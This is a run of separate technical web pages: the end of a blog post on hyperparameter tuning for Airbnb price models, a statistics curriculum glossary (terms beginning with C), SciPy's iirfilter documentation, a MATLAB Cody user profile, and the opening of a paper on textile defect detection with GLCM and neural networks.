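print(50 / total_combinations)  # RandomizedSearchCV with n_iter=50 tries ~2% of them
```

Fitting ~2% of the candidates is enough to locate a promising region, which the subsequent grid search then refines.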
Once this is complete, we use the grid search to get more precise results.

##### Randomized Search with Cross Validation

```python
import numpy as np

# Number of trees in random forest
n_estimators = [int(x) for x in np.linspace(start=10, stop=1000, num=11)]
# Number of features to consider at every split
max_features = ['auto', 'sqrt']
# Maximum number of levels in tree
max_depth = [int(x) for x in np.linspace(10, 110, num=5)]
max_depth.append(None)
# Minimum number of samples required to split a node
min_samples_split = [2, 5, 10]
# Minimum number of samples required at each leaf node
min_samples_leaf = [1, 2, 4]
# Method of selecting samples for training each tree
bootstrap = [True, False]

# Create the random grid
random_grid = {'randomforestregressor__n_estimators': n_estimators,
               'randomforestregressor__max_features': max_features,
               'randomforestregressor__max_depth': max_depth,
               'randomforestregressor__min_samples_split': min_samples_split,
               'randomforestregressor__min_samples_leaf': min_samples_leaf,
               'randomforestregressor__bootstrap': bootstrap}

# Use the random grid to search for the best hyperparameters
from sklearn.model_selection import RandomizedSearchCV

# Random search of parameters, using 2-fold cross-validation,
# search across 50 different combinations, and use all available cores
rf_random = RandomizedSearchCV(estimator=my_pipeline_RF,
                               param_distributions=random_grid,
                               n_iter=50, cv=2, verbose=2,
                               random_state=42, n_jobs=-1,
                               scoring='neg_median_absolute_error')
# Fit our model
rf_random.fit(train_X, train_y)

rf_random.best_params_
```

```
{'randomforestregressor__bootstrap': True,
 'randomforestregressor__max_depth': 35,
 'randomforestregressor__max_features': 'auto',
 'randomforestregressor__min_samples_leaf': 2,
 'randomforestregressor__min_samples_split': 5,
 'randomforestregressor__n_estimators': 1000}
```

##### Grid Search with Cross Validation

```python
from sklearn.model_selection import GridSearchCV

# Create the parameter grid based on the results of random search
param_grid = {
    'randomforestregressor__bootstrap': [True],
    'randomforestregressor__max_depth': [30, 35, 40],
    'randomforestregressor__max_features': ['auto'],
    'randomforestregressor__min_samples_leaf': [1, 2, 3],
    'randomforestregressor__min_samples_split': [4, 5, 6],
    'randomforestregressor__n_estimators': [950, 1000, 1050]
}

# Instantiate the grid search model
grid_search = GridSearchCV(estimator=my_pipeline_RF,
                           param_grid=param_grid,
                           cv=3, n_jobs=-1, verbose=2,
                           scoring='neg_median_absolute_error')

# Fit the grid search to the data
grid_search.fit(train_X, train_y)

grid_search.best_params_
```

```
{'randomforestregressor__bootstrap': True,
 'randomforestregressor__max_depth': 30,
 'randomforestregressor__max_features': 'auto',
 'randomforestregressor__min_samples_leaf': 2,
 'randomforestregressor__min_samples_split': 4,
 'randomforestregressor__n_estimators': 1050}
```

##### Final Model

```python
# Create the pipeline (imputer + scaler + regressor)
my_pipeline_RF_grid = make_pipeline(Imputer(), StandardScaler(),
                                    RandomForestRegressor(random_state=42,
                                                          bootstrap=True,
                                                          max_depth=30,
                                                          max_features='auto',
                                                          min_samples_leaf=2,
                                                          min_samples_split=4,
                                                          n_estimators=1050))

# Fit the model
my_pipeline_RF_grid.fit(train_X, train_y)

evaluate_model(my_pipeline_RF_grid, test_X, test_y)
```

```
Median Absolute Error: 13.57
RMSE: 125.04
```

We get better results with the tuned model than with the default hyperparameters, but the improvement in the median absolute error is modest. Perhaps another model will give better precision.

### Visualisation of all models’ performance

The tuned Random Forest and XGBoost gave the best results on the test set. Surprisingly, the Multi-Layer Perceptron with default parameters gave the highest median absolute errors, and the tuned one did not even give better results than the default Random Forest.
This is unusual; perhaps the Multi-Layer Perceptron needs more data to perform well, or more tuning of important hyperparameters such as hidden_layer_sizes.

## Conclusion

In this post, we modelled Airbnb apartment prices using descriptive data from the Airbnb website. First, we preprocessed the data to remove redundant features and reduce the sparsity of the data. Then we applied three different algorithms, initially with default parameters, which we then tuned. In our results, the tuned Random Forest and tuned XGBoost performed best.

To further improve our models, we could include more feature engineering (for example, time-based features) or try more extensive hyperparameter tuning. If you would like to give it a go yourself, the code and data for this post can be found on GitHub.
# Glossary page C

A  B  C  D  E  F G  H  I J K  L  M  N  O  P  Q  R  S  T  U  V  W X Y Z

## Category data

Data in which the values can be organised into distinct groups. These distinct groups (or categories) must be chosen so that they do not overlap, every value belongs to one and only one group, and there is no doubt as to which one.

The term ‘category data’ is used with two different meanings. The curriculum uses a meaning that puts no restriction on whether or not the categories have a natural ordering; this use of category data has the same meaning as qualitative data. The other meaning restricts category data to categories that do not have a natural ordering.

### Example

The eye colours of a class of year 9 students.

Alternative: categorical data

See: qualitative data

### Curriculum achievement objectives references

Statistical investigation: Levels 1, 2, 3, 4, (5), (6), (7), (8)

## Category variable

A property that may have different values for different individuals and for which these values can be organised into distinct groups. These distinct groups (or categories) must be chosen so that they do not overlap, every value belongs to one and only one group, and there is no doubt as to which one.

The term ‘category variable’ is used with two different meanings. The curriculum uses a meaning that puts no restriction on whether or not the categories have a natural ordering. This use of category variable has the same meaning as qualitative variable.
The other meaning of category variable is restricted to categories which do not have a natural ordering.\n\n### Example\n\nThe eye colours of a class of year 9 students.\n\nAlternative: categorical variable\n\nSee: qualitative variable\n\n### Curriculum achievement objectives references\n\nStatistical investigation: Levels (4), (5), (6), (7), (8)\n\n## Causal-relationship claim\n\nA statement that asserts that changes in a phenomenon (the response) are caused by differences in a received treatment or by differences in the value of another variable (an explanatory variable).\n\nSuch claims can be justified only if the observed phenomenon is a response from a well-designed and well-conducted experiment.\n\n### Curriculum achievement objectives reference\n\nStatistical literacy: Level 8\n\n## Census\n\nA study that attempts to measure every unit in a population.\n\n### Curriculum achievement objectives references\n\nStatistical literacy: Levels (7), (8)\n\n## Central limit theorem\n\nThe fact that the sampling distribution of the sample mean of a numerical variable becomes closer to the normal distribution as the sample size increases. The sample means are from random samples from some population.\n\nThis result applies regardless of the shape of the population distribution of the numerical variable.\n\n‘Central’ is used in this term because there is a tendency for values of the sample mean to be closer to the ‘centre’ of the population distribution than individual values are. 
This tendency strengthens as the sample size increases.

‘Limit’ is used in this term because the closeness or approximation to the normal distribution improves as the sample size increases.

See: sampling distribution

### Curriculum achievement objectives reference

Statistical investigation: Level 8

## Centred moving average

See: moving mean

### Curriculum achievement objectives reference

Statistical investigation: (Level 8)

## Chance

A concept that applies to situations that have a number of possible outcomes, none of which is certain to occur when a trial of the situation is performed.

Two examples of situations that involve elements of chance follow.

### Example 1

A person will be selected and their eye colour recorded.

### Example 2

Two dice will be rolled and the numbers on each die recorded.

### Curriculum achievement objectives references

Probability: All levels

## Class interval

One of the non-overlapping intervals into which the range of values of measurement data, and occasionally whole-number data, is divided. Each value in the distribution must be able to be classified into exactly one of these intervals.

### Example 1 (Measurement data)

The number of hours of sunshine per week in Grey Lynn, Auckland, from Monday 2 January 2006 to Sunday 31 December 2006 are recorded in the frequency table below. The class intervals used to group the values of weekly hours of sunshine are listed in the first column of the table.

| Hours of sunshine | Number of weeks |
| --- | --- |
| 5 to less than 10 | 2 |
| 10 to less than 15 | 2 |
| 15 to less than 20 | 5 |
| 20 to less than 25 | 9 |
| 25 to less than 30 | 12 |
| 30 to less than 35 | 10 |
| 35 to less than 40 | 5 |
| 40 to less than 45 | 6 |
| 45 to less than 50 | 1 |
| Total | 52 |

### Example 2 (Whole-number data)

Students enrolled in an introductory statistics course at the University of Auckland were asked to complete an online questionnaire.
One of the questions asked them to enter the number of countries they had visited, other than New Zealand. The class intervals used to group the values are listed in the first column of the table.

| Number of countries visited | Frequency |
| --- | --- |
| 0 – 4 | 446 |
| 5 – 9 | 172 |
| 10 – 14 | 69 |
| 15 – 19 | 19 |
| 20 – 24 | 14 |
| 25 – 29 | 4 |
| 30 – 34 | 3 |
| Total | 727 |

Alternatives: bin, class

### Curriculum achievement objectives references

Statistical investigation: Levels (4), (5), (6), (7), (8)

## Cleaning data

The process of finding and correcting (or removing) errors in a data set in order to improve its quality.

Mistakes in data can arise in many ways, such as:

• A respondent may interpret a question in a different way from that intended by the writer of the question.
• An experimenter may misread a measuring instrument.
• A data entry person may mistype a value.

### Curriculum achievement objectives references

Statistical investigation: Levels 5, (6), (7), (8)

## Cluster (in a distribution of a numerical variable)

A distinct grouping of neighbouring values in a distribution of a numerical variable that occur noticeably more often than values on each side of these neighbouring values. If a distribution has two or more clusters, then they will be separated by places where values are spread thinly or are absent.

In distributions with a small number of values or with values that are spread thinly, some values may appear to form small clusters. Such groupings may be due to natural variation (see sources of variation), and these groupings may not be apparent if the distribution had more values.
Be cautious about commenting on small groupings in such distributions.

For the use of ‘cluster’ in cluster sampling, see the description of cluster sampling.

### Example 1

The number of hours of sunshine per week in Grey Lynn, Auckland, from Monday 2 January 2006 to Sunday 31 December 2006 are displayed in the dot plot below.

[Dot plot: weekly hours of sunshine]

From the greater density of the dots in the plot, we can see that the values have one cluster from about 23 to 37 hours per week of sunshine.

### Example 2

A sample of 40 parents was asked about the time they spent in paid work in the previous week. Their responses are displayed in the dot plot below.

[Dot plot: weekly hours of paid work for 40 parents]

There are three clusters in the distribution: a group who did a very small amount of or no paid work, a group who did part-time work (about 20 hours), and a group who did full-time work (about 35 to 40 hours).

### Curriculum achievement objectives references

Statistical investigation: Levels (2), (3), (4), (5), (6)
Statistical literacy: Levels (2), (3), (4), (5), (6)

## Cluster sampling

A method of sampling in which the population is split into naturally forming groups (the clusters), with the groups having similar characteristics that are known for the whole population. A simple random sample of clusters is selected. Either the individuals in these clusters form the sample or simple random samples chosen from each selected cluster form the sample.

### Example

Consider obtaining a sample of secondary school students from Wellington. The secondary schools in Wellington are suitable clusters. A simple random sample of these schools is selected.
Either all students from the selected schools form the sample or simple random samples chosen from each selected school form the sample.\n\n### Curriculum achievement objectives references\n\nStatistical investigation: Levels (7), (8)\n\n## Coefficient of determination (in linear regression)\n\nThe proportion of the variation in the response variable that is explained by the regression model.\n\nIf there is a perfect linear relationship between the explanatory variable and the response variable, there will be some variation in the values of the response variable because of the variation that exists in the values of the explanatory variable. In any real data, there will be more variation in the values of the response variable than the variation that would be explained by a perfect linear relationship. The total variation in the values of the response variable can be regarded as being made up of variation explained by the linear regression model and unexplained variation. The coefficient of determination is the proportion of the explained variation relative to the total variation.\n\nIf the points are close to a straight line, then the unexplained variation will be a small proportion of the total variation in the values of the response variable. This means that the closer the coefficient of determination is to 1, the stronger the linear relationship.\n\nThe coefficient of determination is also used in more advanced forms of regression, and is usually represented by R2. In linear regression, the coefficient of determination, R2, is equal to the square of the correlation coefficient, i.e., R2 = r2.\n\n### Example\n\nThe actual weights and self-perceived ideal weights of a random sample of 40 female students enrolled in an introductory statistics course at the University of Auckland are displayed on the scatter plot below. A regression line has been drawn. 
The equation of the regression line is:

predicted y = 0.6089x + 18.661, or predicted ideal weight = 0.6089 × actual weight + 18.661

[Scatter plot: ideal weight versus actual weight, with regression line]

The coefficient of determination R2 = 0.822

This means that 82.2% of the variation in the ideal weights is explained by the regression model (i.e., by the equation of the regression line).

### Curriculum achievement objectives reference

Statistical investigation: (Level 8)

## Combined event

An event that consists of the occurrence of two or more events.

Two different ways of combining events A and B are: A or B, and A and B.

A or B is the event consisting of outcomes that are either in A or B or both.

[Venn diagram: A or B (union)]

A and B is the event consisting of outcomes that are common to both A and B.

[Venn diagram: A and B (intersection)]

### Example

Suppose we have a group of men and women and each person is a possible outcome of a probability activity. A is the event that a person is a woman and B is the event that a person is taller than 170cm.

Consider A and B. The outcomes in the combined event A and B will consist of the women who are taller than 170cm.

Consider A or B. The outcomes in the combined event A or B will consist of all of the women as well as the men taller than 170cm. An alternative description is that the combined event A or B will consist of all people taller than 170cm as well as the women who are not taller than 170cm.

Alternatives: compound event, joint event

### Curriculum achievement objectives reference

Probability: Level 8

## Complementary event

With reference to a given event, the event that the given event does not occur.
In other words, the complementary event to an event A is the event consisting of all of the possible outcomes that are not in event A.

There are several symbols for the complement of event A. The most common are A' and Ā.

[Venn diagram: the complement of event A]

### Example

Suppose we have a group of men and women and each person is a possible outcome of a probability activity. If A is the event that a person is aged 30 years or more, then the complement of event A, A', consists of the people aged less than 30 years.

### Curriculum achievement objectives reference

Probability: (Level 8)

## Conditional event

An event that consists of the occurrence of one event based on the knowledge that another event has already occurred.

The conditional event consisting of event A occurring, knowing that event B has already occurred, is written as A | B, and is expressed as ‘event A given event B’. Event B is considered to be the ‘condition’ in the conditional event A | B.

The probability of the conditional event A | B is P(A | B) = P(A and B) / P(B).

For a justification of the above formula, see the example below.

### Example

Suppose we have a group of men and women and each person is a possible outcome of the probability activity of selecting a person.
A is the event that a person is a woman, and B is the event that a person is taller than 170cm.

Consider A | B.

Given that B has occurred, the outcomes of interest are now restricted to those taller than 170cm. A | B will then be the women among those taller than 170cm.

Suppose that the genders and heights of the people were as displayed in the two-way table below.

| Gender | Taller than 170cm | Not taller than 170cm | Total |
| --- | --- | --- | --- |
| Male | 68 | 15 | 83 |
| Female | 28 | 89 | 117 |
| Total | 96 | 104 | 200 |

Given that B has occurred, the outcomes of interest are the 96 people taller than 170cm.

If a person is randomly selected from these 96 people, then the probability that the person is female is P(A | B) = 28/96 = 0.292.

If both parts of the fraction are divided by 200, this becomes P(A | B) = (28/200)/(96/200) = P(A and B)/P(B).

### Curriculum achievement objectives reference

Probability: Level 8

## Confidence interval

An interval estimate of a population parameter. A confidence interval is therefore an interval of values, calculated from a random sample taken from the population, of which any number in the interval is a possible value for a population parameter.

The word ‘confidence’ is used in the term because the method that produces the confidence interval has a specified success rate (confidence level) for the percentage of times such intervals contain the true value of the population parameter in the long run.
95% is commonly used as the confidence level.

See: bootstrap confidence interval, bootstrapping, margin of error

### Curriculum achievement objectives reference

Statistical investigation: Level 8

## Confidence level

A specified percentage success rate for a method that produces a confidence interval, meaning that the method has this rate for the percentage of times such intervals contain the true value of the population parameter in the long run.

The most commonly used confidence level is 95%.

The confidence level associated with the process of forming a bootstrap confidence interval for a parameter cannot be determined accurately but, in most cases, the confidence level will be about 90% or higher (especially if any samples used are quite large). That is, just because the central 95% of estimates was used to form the bootstrap confidence interval, we cannot say that the confidence level is 95%.

This confidence level concept can be illustrated using the ‘Confidence interval coverage’ module from the iNZightVIT software. The module produced the following output. Note that to use this module you must have data on every unit in the population.

[Screenshot: output of the ‘Confidence interval coverage’ module]

The population used is 500 students from the CensusAtSchool database. This is multivariate data. The variable ‘rightfoot’ (the length of a student’s right foot, in centimetres), the quantity ‘mean’, the confidence interval method ‘bootstrap: percentile’, the sample size ‘30’ and the number of repetitions ‘1000’ were selected.

The ‘Population’ plot shows the population distribution of the right foot lengths of the 500 students in the population. The vertical line shows the true population mean (about 23.4cm).
The darker dots show the final random sample selected.\n\nThe true population mean is also shown as a dotted line through all three plots.\n\nThe ‘Sample’ plot shows the 30 foot lengths from the sample, the sample mean (vertical line) and the bootstrap confidence interval (horizontal line).\n\nThe ‘CI history’ plot shows bootstrap confidence intervals constructed from some of the samples. The bootstrap confidence intervals that contained (covered) the true population mean are shaded in a light colour (green) and the bootstrap confidence intervals that did not contain (did not cover) the true population mean are shaded in a dark colour (red). The box gives the percentage success rate of the bootstrap confidence interval process based on 1000 samples. The success rate of 94.7% estimates the confidence level when using the bootstrap confidence interval process on this population and for this sample size.\n\nAlternative: coverage\n\nSee: bootstrap confidence interval, bootstrapping\n\n### Curriculum achievement objectives reference\n\nStatistical investigation: (Level 8)\n\n## Confidence limits\n\nThe lower and upper boundaries of a confidence interval.\n\n### Curriculum achievement objectives reference\n\nStatistical investigation: (Level 8)\n\n## Continuous distribution\n\nThe variation in the values of a variable that can take any value in an (appropriately-sized) interval of numbers.\n\nA continuous distribution may be an experimental distribution, a sample distribution, a population distribution, or a theoretical probability distribution of a measurement variable. 
Although the recorded values in an experimental or sample distribution may be rounded, the distribution is usually still regarded as being continuous.\n\n### Example\n\nAt Levels 7 and 8, the normal distribution is an example of a continuous theoretical probability distribution.\n\nSee: distribution\n\n### Curriculum achievement objectives references\n\nStatistical investigation: Levels (5), (6), (7), (8)\n\nProbability: Levels (5), (6), 7, (8)\n\n## Continuous random variable\n\nA random variable that can take any value in an (appropriately-sized) interval of numbers.\n\n### Example\n\nThe height of a randomly selected individual from a population.\n\n### Curriculum achievement objectives references\n\nProbability: Levels (7), 8\n\n## Correlation\n\nThe strength and direction of the relationship between two numerical variables.\n\nIn assessing the correlation between two numerical variables, one variable does not need to be regarded as the explanatory variable and the other as the response variable, as is necessary in linear regression.\n\nTwo numerical variables have positive correlation if the values of one variable tend to increase as the values of the other variable increase.\n\nTwo numerical variables have negative correlation if the values of one variable tend to decrease as the values of the other variable increase.\n\nCorrelation is often measured by a correlation coefficient, the most common of which measures the strength and direction of the linear relationship between two numerical variables. 
In this linear case, correlation describes how close points on a scatter plot are to lying on a straight line.

See: correlation coefficient

### Curriculum achievement objectives reference

Statistical investigation: Level (8)

## Correlation coefficient

A number between -1 and 1 calculated so that the number represents the strength and direction of the linear relationship between two numerical variables.

A correlation coefficient of 1 indicates a perfect linear relationship with positive slope. A correlation coefficient of -1 indicates a perfect linear relationship with negative slope.

The most widely used correlation coefficient is called Pearson’s (product-moment) correlation coefficient, and it is usually represented by r.

Some other properties of the correlation coefficient, r:

1. The closer the value of r is to 1 or -1, the stronger the linear relationship.
2. r has no units.
3. r is unchanged if the axes on which the variables are plotted are reversed.
4. If the units of one, or both, of the variables are changed, then r is unchanged.

### Example

The actual weights and self-perceived ideal weights of a random sample of 40 female students enrolled in an introductory statistics course at the University of Auckland are displayed on the scatter plot below.

[Scatter plot: ideal weight versus actual weight]

The correlation coefficient r = 0.906

See: coefficient of determination (in linear regression), correlation

### Curriculum achievement objectives reference

Statistical investigation: (Level 8)

## Cyclical component (for time-series data)

Long-term variations in time-series data that repeat in a reasonably systematic way over time. The cyclical component can often be represented by a wave-shaped curve, which represents alternating periods of expansion and contraction.
The successive waves of the curve may have different periods.

Cyclical components are difficult to analyse, and at Level 8 cyclical components can be described along with the trend.

See: time-series data

### Curriculum achievement objectives reference

Statistical investigation: (Level 8)

Last updated September 27, 2013
https://docs.scipy.org/doc/scipy-1.1.0/reference/generated/scipy.signal.iirfilter.html
# scipy.signal.iirfilter

scipy.signal.iirfilter(N, Wn, rp=None, rs=None, btype='band', analog=False, ftype='butter', output='ba')

IIR digital and analog filter design given order and critical points.

Design an Nth-order digital or analog filter and return the filter coefficients.

Parameters:

- N (int): The order of the filter.
- Wn (array_like): A scalar or length-2 sequence giving the critical frequencies. For digital filters, Wn is normalized from 0 to 1, where 1 is the Nyquist frequency, pi radians/sample. (Wn is thus in half-cycles / sample.) For analog filters, Wn is an angular frequency (e.g. rad/s).
- rp (float, optional): For Chebyshev and elliptic filters, provides the maximum ripple in the passband (dB).
- rs (float, optional): For Chebyshev and elliptic filters, provides the minimum attenuation in the stop band (dB).
- btype ({'bandpass', 'lowpass', 'highpass', 'bandstop'}, optional): The type of filter. Default is 'bandpass'.
- analog (bool, optional): When True, return an analog filter; otherwise a digital filter is returned.
- ftype (str, optional): The type of IIR filter to design: Butterworth ('butter'), Chebyshev I ('cheby1'), Chebyshev II ('cheby2'), Cauer/elliptic ('ellip'), Bessel/Thomson ('bessel').
- output ({'ba', 'zpk', 'sos'}, optional): Type of output: numerator/denominator ('ba'), pole-zero ('zpk'), or second-order sections ('sos'). Default is 'ba'.

Returns:

- b, a (ndarray, ndarray): Numerator (b) and denominator (a) polynomials of the IIR filter. Only returned if output='ba'.
- z, p, k (ndarray, ndarray, float): Zeros, poles, and system gain of the IIR filter transfer function. Only returned if output='zpk'.
- sos (ndarray): Second-order sections representation of the IIR filter. Only returned if output='sos'.

See also: butter (filter design using order and critical points), buttord (find order and critical points from passband and stopband spec), iirdesign (general filter design using passband and stopband spec).

Notes

The 'sos' output parameter was added in 0.16.0.

Examples

Generate a 17th-order Chebyshev II bandpass filter and plot the frequency response:

>>> import numpy as np
>>> from scipy import signal
>>> import matplotlib.pyplot as plt

>>> b, a = signal.iirfilter(17, [50, 200], rs=60, btype='band',
...                         analog=True, ftype='cheby2')
>>> w, h = signal.freqs(b, a, 1000)
>>> fig = plt.figure()
>>> ax = fig.add_subplot(111)
>>> ax.semilogx(w, 20 * np.log10(abs(h)))
>>> ax.set_title('Chebyshev Type II bandpass frequency response')
>>> ax.set_ylabel('Amplitude [dB]')
>>> ax.axis((10, 1000, -100, 10))
>>> ax.grid(which='both', axis='both')
>>> plt.show()
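Beyond the analog example above, the digital path with output='sos' is often preferable at high filter orders, since second-order sections avoid the numerical problems of long 'ba' polynomials. A short sketch; the order, band edges, and test signal below are arbitrary choices for illustration, not values from the documentation:

```python
import numpy as np
from scipy import signal

# Design an 8th-order digital Butterworth bandpass filter as second-order
# sections. Band edges are fractions of the Nyquist frequency (0.2, 0.5).
sos = signal.iirfilter(8, [0.2, 0.5], btype='band',
                       ftype='butter', output='sos')

# Each row of `sos` is one biquad: [b0, b1, b2, a0, a1, a2].
# A bandpass of order N has 2N poles, hence N sections here.
print(sos.shape)  # (8, 6)

# Filter a noisy sinusoid whose frequency lies inside the passband.
rng = np.random.default_rng(0)
t = np.arange(1024)
x = np.sin(0.3 * np.pi * t) + 0.5 * rng.standard_normal(t.size)
y = signal.sosfilt(sos, x)
```

`sosfilt` applies the cascade of biquads in one pass; for zero-phase filtering, `sosfiltfilt` could be substituted.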
https://jp.mathworks.com/matlabcentral/profile/authors/21441977
Community Profile

# Cuong Nguyen

Last seen: 2 months ago. Active since 2021.

#### Content Feed

Cody problems solved (all about 2 months before this snapshot):

- Find nearest prime number less than input number: For example: if the input number is 125, then the nearest prime number whi...
- Largest Twin Primes: Twin primes (en.wikipedia.org/wiki/Twin_prime) are primes p1, p2 = p1 + 2 such that both p1 and p2 are prime numbers. Giv...
- Mersenne Primes: A Mersenne prime is a prime number of the form M = 2^p - 1, where p is another prime number. For example, 31 is a Mersenne prim...
- Mersenne Primes vs. All Primes: A Mersenne prime (M) is a prime number of the form M = 2^p - 1, where p is another prime number. https://www.mathworks.com/matl...
- Sophie Germain prime: In number theory, a prime number p is a Sophie Germain prime if 2p + 1 is also prime. For example, 23 is a Sophie Germain prim...
- Factorize THIS, buddy: List the prime factors for the input number, in decreasing order. List each factor only once, even if the factorization includes...
- Multiples of a Number in a Given Range: Given an integer factor f and a range defined by xlow and xhigh inclusive, return a vector of the multiples of f that fa...
- Proper Factors: Generate the proper factors of input integer x and return them in ascending order. For more information on proper factors, refer...
- Get all prime factors: List the prime factors for the input number, in decreasing order. List each factor. If the prime factor occurs twice, list it as...
- Make roundn function: Make a roundn function using round. x=0.55555; y=function(x,1) gives y=1; y=function(x,2) gives y=0.6; y=function(x,3) ...
- Rounding off numbers to n decimals: Inspired by a mistake in one of the problems I created, I created this problem where you have to round off a floating point numb...
- Matlab Basics - Rounding III: Write a script to round a large number to the nearest 10,000, e.g. x = 12,358,466,243 --> y = 12,358,470,000
- Matlab Basics - Rounding II: Write a script to round a variable x to 3 decimal places, e.g. x = 2.3456 --> y = 2.346
- MATLAB Basic: rounding III
- Check that number is whole number: Say x=15, then the answer is 1; x=15.2, then the answer is 0. (en.wikipedia.org/wiki/Whole_numb...)
- MATLAB Basic: rounding IV
- MATLAB Basic: rounding II
- MATLAB Basic: rounding: Do rounding toward zero. Example: -8.8, answer -8; +8.1, answer 8
- Vector creation: Create a vector using square brackets going from 1 to the given value x in steps of 1. Hint: use increment.
- Doubling elements in a vector: Given the vector A, return B in which all numbers in A are doubled. So for: A = [ 1 5 8 ] then B = [ 1 1 5 ...
- Create a vector: Create a vector from 0 to n by intervals of 2.
- Flip the vector from right to left: Examples: x=[1:5], then y=[5 4 3 2 1]; x=[1 4 6], then y=[6 4 1]. Request not ...
- Whether the input is vector?: Given the input x, return 1 if x is a vector, or else 0.
- Find max: Find the maximum value of a given vector or matrix.
- Get the length of a given vector: Given a vector x, the output y should equal the length of x.
- Inner product of two vectors: Find the inner product of two vectors.
- Arrange Vector in descending order: If x=[0,3,4,2,1] then y=[4,3,2,1,0]
- Can we make a triangle?: Given three positive numbers, check whether a triangle can be made with these side lengths or not. Remember that in a triangle the su...
- Find the sides of an isosceles triangle when given its area and height from its base to apex: For example, with A=12 and ...
- Height of a right-angled triangle: Given numbers a, b and c, find the height of the right-angled triangle with sides a and b and hypotenuse c, for the base c. If a...
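Most of these Cody exercises are short one-function problems. As an illustration, the first problem in the feed can be solved as below; this is a Python sketch (the profile page does not show the submitted MATLAB solutions), assuming "nearest prime less than n" means the largest prime strictly below n:

```python
def nearest_prime_below(n):
    """Largest prime strictly less than n (assumes n > 2)."""
    def is_prime(k):
        if k < 2:
            return False
        # Trial division up to sqrt(k) is plenty for Cody-sized inputs.
        return all(k % d for d in range(2, int(k ** 0.5) + 1))

    m = n - 1
    while not is_prime(m):
        m -= 1
    return m

print(nearest_prime_below(125))  # 113
```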
https://www.scirp.org/journal/paperinformation.aspx?paperid=61639
Identification of Textile Defects Based on GLCM and Neural Networks

Abstract

In the modern textile industry, Tissue online Automatic Inspection (TAI) is becoming an attractive alternative to Human Vision Inspection (HVI). HVI demands a high level of attention yet delivers low performance in tissue inspection. Based on the co-occurrence matrix and its statistical features, as an approach to identifying textile defects in digital images, TAI can potentially provide an objective and reliable evaluation of fabric production quality. The goal of most TAI systems is to detect the presence of faults in textiles and accurately locate the position of the defects. The motivation behind fabric defect identification is to enable on-line quality control of the weaving process. In this paper, we propose a method based on texture analysis and neural networks to identify textile defects. A feature extractor is designed based on the Gray Level Co-occurrence Matrix (GLCM). A neural network is used as a classifier to identify the textile defects. The numerical simulation showed that the recognition rates were 100% for training and 100% and 91% for the best and worst testing, respectively.

Share and Cite:

Azim, G. (2015) Identification of Textile Defects Based on GLCM and Neural Networks. Journal of Computer and Communications, 3, 1-8. doi: 10.4236/jcc.2015.312001.

Received 7 October 2015; accepted 29 November 2015; published 2 December 2015

1. Introduction

Texture analysis is necessary for many computer image analysis applications such as classification, detection, or segmentation of images. On the other hand, defect detection is an important problem in the fabric quality control process. At present, texture quality identification is performed manually. Tissue online Automatic Inspection (TAI) therefore increases the efficiency of production lines and improves the quality of the products as well.
Many attempts have been made based on three different approaches: statistical, spectral, and model based.

In this research paper, we investigate the potential of the Gray Level Co-occurrence Matrix (GLCM) and neural networks used as a classifier to identify textile defects. GLCM is a widely used texture descriptor. The statistical features of the GLCM are based on the gray level intensities of the image. Such features are useful in texture recognition, image segmentation, image retrieval, color image analysis, image classification, object recognition, texture analysis methods, etc. The statistical features are extracted from the GLCM of the textile digital image. The GLCM is used as a technique for extracting texture features. The neural networks are used as a classifier to detect the presence of defects in textile fabric products.

The paper is organized as follows. In the next section, we introduce a brief presentation of the GLCM. In Section 3, the concept of neural networks with training of multilayer perceptrons is described. Image analysis (feature extraction and data preprocessing) is given in Section 4. Numerical simulation and discussion are presented in Section 5; at the end a conclusion is given.

2. Gray-Level Co-Occurrence Matrix (GLCM)

One of the simplest approaches for describing texture is using statistical moments of the intensity histogram of an image or region. Using a statistical method such as the co-occurrence matrix is important to get valuable information about the relative position of neighboring pixels in an image. Histogram-based texture measures carry only information about the intensity distribution, not about the relative position of pixels with respect to each other within the texture.

Given an image I of size N × N and a pixel offset (Δx, Δy), the co-occurrence matrix P is defined as

P(i, j) = #{ (x, y) : I(x, y) = i and I(x + Δx, y + Δy) = j }.  (1)

In the following, we present and review some features of a digital image computed from the GLCM.
Those are Energy, Contrast, Correlation, and Homogeneity (the feature vector). The energy, also known as uniformity or ASM (angular second moment), is calculated as:

Energy: E = Σ_i Σ_j p(i, j)².  (2)

Contrast measures texture coarseness, or the gross variance of the gray level; it is expected to be high in a coarse texture with significant local variation of the gray level. Mathematically, this feature is calculated as:

Contrast: C = Σ_i Σ_j (i − j)² p(i, j).  (3)

Texture correlation measures the linear dependence of the gray level of a pixel on those of its neighboring pixels. This feature is computed as:

Correlation: ρ = Σ_i Σ_j (i − μ_i)(j − μ_j) p(i, j) / (σ_i σ_j),  (4)

where μ_i = Σ_i Σ_j i · p(i, j), μ_j = Σ_i Σ_j j · p(i, j), σ_i² = Σ_i Σ_j (i − μ_i)² p(i, j), and σ_j² = Σ_i Σ_j (j − μ_j)² p(i, j).

Homogeneity measures the local similarity of pixel pairs; it is high if the gray levels of each pixel pair are similar. This feature is calculated as follows:

Homogeneity: H = Σ_i Σ_j p(i, j) / (1 + |i − j|).  (5)

3. Neural Networks Construction

Artificial neural networks (ANN) are massively parallel connected structures composed of simple nonlinear processing units. Because of their massively parallel structure, they can perform high-speed calculations if implemented on dedicated hardware. Thanks to their adaptive nature, they can learn the characteristics of the input signals and adapt to changes in the data. The nonlinear character of ANNs helps to perform function approximation and signal filtering operations that are beyond optimal linear techniques. The output layer is used to provide an answer for a given set of input values (Figure 1). In this work a multilayer feed-forward artificial neural network is used as the classifier, where the objective of the back-propagation training is to change the connection weights of the neurons in a direction which minimizes the error E, defined as the squared difference between the desired and the actual outputs of the output nodes.
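A minimal numerical illustration of such a momentum-based back-propagation update (the rule formalized in Equation (6)); the toy quadratic error is illustrative only, while the step constants match the η = 0.01 and α = 0.9 reported in Section 4.2:

```python
def momentum_step(w, grad, delta_prev, eta=0.01, alpha=0.9):
    """One update: the new weight change is -eta * gradient
    plus alpha times the previous weight change."""
    delta = -eta * grad + alpha * delta_prev
    return w + delta, delta

# Toy error surface E(w) = 0.5 * w**2, so dE/dw = w.
w, delta = 5.0, 0.0
for _ in range(500):
    w, delta = momentum_step(w, w, delta)
print(abs(w) < 1e-6)  # True: the weight has settled at the minimum, w = 0
```

The momentum term damps the oscillation that a plain gradient step would show; with these constants the iteration is a lightly damped spiral into the minimum.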
The variation of the connection weight at the kth iteration is defined by the following equation:

Δw_ij(k) = −η ∂E/∂w_ij + α Δw_ij(k − 1),  (6)

where η is the proportionality constant termed the learning rate and α is a momentum term.

